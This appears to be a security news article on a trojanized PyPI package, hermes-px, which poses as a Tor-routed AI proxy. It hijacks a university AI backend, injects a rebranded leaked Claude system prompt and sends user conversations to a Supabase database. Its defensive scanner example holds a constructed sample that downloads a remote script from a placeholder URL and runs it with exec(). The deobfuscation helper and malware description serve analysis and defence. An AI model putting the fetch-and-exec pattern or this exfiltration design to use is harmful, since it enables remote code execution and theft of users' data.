
Trojanized PyPI AI Proxy Steals Claude Prompts and Exfiltrates Data


The Menace of the Malicious PyPI Package: "hermes-px"

Security researchers at JFrog have identified a malicious package on the Python Package Index (PyPI) named hermes-px. Posing as a "Secure AI Inference Proxy," the package harvests user prompts while routing inference through an artificial intelligence service operated by a private university. The discovery illustrates the effort attackers now put into making a supply-chain lure look like a legitimate developer tool.

Marketed as an OpenAI-compatible, Tor-routed proxy that requires no API keys, hermes-px disguises its true intent by hijacking an internal AI endpoint from Université Centrale in Tunisia. This malicious software injects a stolen prompt from Anthropic’s Claude model into user interactions and subsequently exfiltrates all conversations to an attacker-controlled Supabase database. Such deceitful actions not only violate user trust but also abuse legitimate academic resources.

What sets hermes-px apart from the typical low-effort malware found on PyPI is its unusually polished documentation. Rather than the sparse or missing explanations of most rogue packages, it ships with installation instructions, a migration guide for developers moving from the OpenAI SDK, and example Retrieval-Augmented Generation (RAG) pipelines. It even includes detailed error-handling notes, all crafted to win developers' confidence.

The package exposes an API that closely mirrors the official OpenAI Python SDK. This lets developers drop in hermes-px and call functions such as client.chat.completions.create() with minimal code changes, which further disguises its purpose. The README goes a step further by promoting an "Interactive Learning CLI" that instructs users to fetch a remote Python script from a GitHub URL with urllib.request and run it with exec(), a glaring red flag for remote code execution at runtime.
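The fetch-and-exec pattern described above is easy to flag statically before a package ever runs. The following scanner is an added example written for this article, not code from the package or from JFrog; it parses a module's AST and reports any exec()/eval()/compile() call in a file that also performs a remote fetch. The sample module it scans is constructed to mirror the README's instructions and uses a placeholder URL.

```python
import ast

# Constructed sample mirroring the README's "Interactive Learning CLI" pattern:
# fetch a remote script with urllib.request, then run it with exec().
# The URL is a placeholder, not the real repository from the report.
SAMPLE_CLI = '''
import urllib.request
url = "https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/learn.py"
code = urllib.request.urlopen(url).read().decode()
exec(code)
'''

# Call names that pull content from the network (urllib, requests) and that run it.
REMOTE_FETCHERS = {"urlopen", "urlretrieve", "get", "post"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}


def _call_name(node: ast.Call) -> str:
    """Return the trailing name of a call: 'urlopen' for urllib.request.urlopen(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def find_fetch_and_exec(source: str) -> list:
    """Return one finding per dynamic-execution call in a module that also
    fetches remote content. Each finding records the exec line, the call used,
    and every remote-fetch line in the same module, so a reviewer can confirm
    whether fetched data reaches exec(). An empty list means nothing suspicious."""
    tree = ast.parse(source)
    fetch_lines, exec_calls = [], []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in REMOTE_FETCHERS:
            fetch_lines.append(node.lineno)
        elif name in DYNAMIC_EXEC:
            exec_calls.append((node.lineno, name))
    if not fetch_lines:
        return []
    return [{"exec_line": line, "call": call, "fetch_lines": sorted(fetch_lines)}
            for line, call in sorted(exec_calls)]


if __name__ == "__main__":
    for finding in find_fetch_and_exec(SAMPLE_CLI):
        print(f"remote fetch on line(s) {finding['fetch_lines']} feeds "
              f"{finding['call']}() on line {finding['exec_line']}")
```

Run it over every .py file in a freshly downloaded wheel or sdist; a hit is a reason to read the code, not proof of malice, since some installers legitimately fetch remote content without executing it.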

This deceitful project is backed by a fictitious GitHub organization known as “EGen Labs,” which lends it an air of legitimacy, further complicating the detection of its malicious nature. The repository has since been taken down, returning a 404 error code, indicating that it had served as a flexible payload delivery channel without necessitating an updated PyPI release.

Hijacked University AI Backend

Under the hood, hermes-px builds a requests.Session with spoofed browser headers and directs all inference traffic through a local Tor SOCKS5 proxy. This masks the attacker's identity and conceals the misuse of the upstream AI service. The target URL, stored in encrypted form, resolves to a private API endpoint at prod.universitecentrale[.]net:9443, matching the infrastructure of the Tunisian university. The endpoint even fronts a WAF-protected chat interface consistent with a legitimate campus AI advising chatbot.

The payload makes two encrypted references to "academic specialties," with instructions that align with typical academic advisor tasks, such as guiding students on subject selection in fields like mathematics, programming, and cybersecurity. Collectively, these indicators spotlight how hermes-px exploits a genuine academic service that was never intended for public access.

Among its components, the package includes a file named base_prompt.pz, which unpacks from 103 KB of encoded data into a massive 246,000-character system prompt that bears a striking resemblance to the leaked Claude model’s prompt. The malicious actor executed a bulk find-and-replace tactic, rebranding terms such as "Claude" to "AXIOM-1" and "Anthropic" to "EGen Labs." Yet, several unmistakable references were left intact, maintaining echoes of the original model.

During every request processed by hermes-px, this elaborate system prompt is injected, ensuring that the hijacked backend operates with a carefully crafted and proprietary context outlined by the attackers.

Response Laundering and Telemetry

To further hide the true upstream provider, hermes-px rewrites responses before returning them. It replaces mentions of "OpenAI" with "EGen Labs" and alters related terminology, sustaining the illusion of a proprietary AI model. Quota-exceeded errors are rewritten into benign notifications claiming "the model is currently offline," which point users to the fraudulent documentation.

The real danger of hermes-px, however, lies in its telemetry module. Presented as a benign feature, it exfiltrates the original user messages and AI responses to a Supabase database on every inference request. This telemetry is enabled by default and is sent as a direct API call that does not pass through Tor, so it exposes the user's real IP address while the package claims to offer anonymized AI interactions.

To evade detection, the package employs a complex three-tiered obfuscation system, wrapping sensitive strings—including URLs, headers, and credentials—in XOR encryption, zlib compression, and base64 encoding. This intricate layering significantly complicates static analysis and makes traditional detection tools less effective against hermes-px.
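An analyst triaging a package like this needs to peel those three layers back. The helper below is an added example for this article, not code recovered from hermes-px or published by JFrog; it assumes the layer order zlib, then XOR, then base64 (the report names the layers but not their order) and shows both decoding with a known key and recovering an unknown single-byte key by checking for the zlib stream header. The sample blob is constructed from a placeholder endpoint, not the real one.

```python
import base64
import zlib


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def wrap(plaintext: str, key: bytes) -> str:
    """Build a layered blob for the sample. Assumed order: zlib -> XOR -> base64."""
    return base64.b64encode(xor_bytes(zlib.compress(plaintext.encode()), key)).decode()


def unwrap(blob: str, key: bytes) -> str:
    """Reverse the three layers when the XOR key is known."""
    return zlib.decompress(xor_bytes(base64.b64decode(blob), key)).decode()


def recover_single_byte_key(blob: str):
    """Brute-force an unknown single-byte XOR key. Because the layer under the XOR
    is a zlib stream, a correct key must yield 0x78 as the first byte (the zlib
    CMF byte for deflate) and must decompress cleanly. Returns (key, plaintext)
    or None when no key produces a valid stream."""
    raw = base64.b64decode(blob)
    for k in range(256):
        candidate = xor_bytes(raw, bytes([k]))
        if candidate[0] != 0x78:
            continue
        try:
            return k, zlib.decompress(candidate).decode()
        except (zlib.error, UnicodeDecodeError):
            continue
    return None


# Constructed sample: a placeholder endpoint wrapped with a single-byte key of 0x5a.
# This is NOT the real endpoint or key from the report.
SAMPLE_PLAINTEXT = "https://placeholder-endpoint.invalid:9443/api/chat"
SAMPLE_KEY = b"\x5a"
SAMPLE_BLOB = wrap(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print("known key  :", unwrap(SAMPLE_BLOB, SAMPLE_KEY))
    print("brute force:", recover_single_byte_key(SAMPLE_BLOB))
```

For a multi-byte key, unwrap() still works once the key has been pulled from the package's own decoding routine, which is where a static review should look first.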

For developers who inadvertently implemented hermes-px, this malicious package has potentially compromised their entire digital environment. It grants unknown attackers access to full transcripts of user interactions, alongside critical metadata which could include sensitive credentials, internal codes, and other confidential information mistakenly transmitted through this "free" proxy service.

In light of these findings, JFrog strongly advises users to immediately uninstall hermes-px, rotate any relevant secrets that might have been exposed, and scrutinize conversations for any sensitive data leaks. As a precautionary measure, blocking the Supabase exfiltration domain and removing Tor—if installed solely for the operation of this package—is also suggested.

This troubling incident serves as a sobering reminder of the vulnerabilities present in the rapidly evolving landscape of cybersecurity and underscores the necessity for developers to remain vigilant against deceptive practices in software distribution.
